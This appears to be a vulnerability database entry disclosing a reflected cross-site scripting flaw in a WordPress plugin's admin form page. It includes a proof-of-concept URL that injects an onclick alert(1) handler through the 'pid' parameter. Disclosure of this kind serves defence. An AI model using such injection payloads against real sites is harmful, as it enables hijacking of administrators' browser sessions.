The plugin does not escape the lang and pid parameter before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues
https://example.com/wp-admin/admin.php?sib_page_form&action=edit&id=1&pid=xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22
ZhongFu Su(JrXnm) of Wuhan University
ZhongFu Su(JrXnm) of Wuhan University
Yes
2022-01-12 (about 1 years ago)
2022-01-12 (about 1 years ago)
2022-09-26 (about 4 months ago)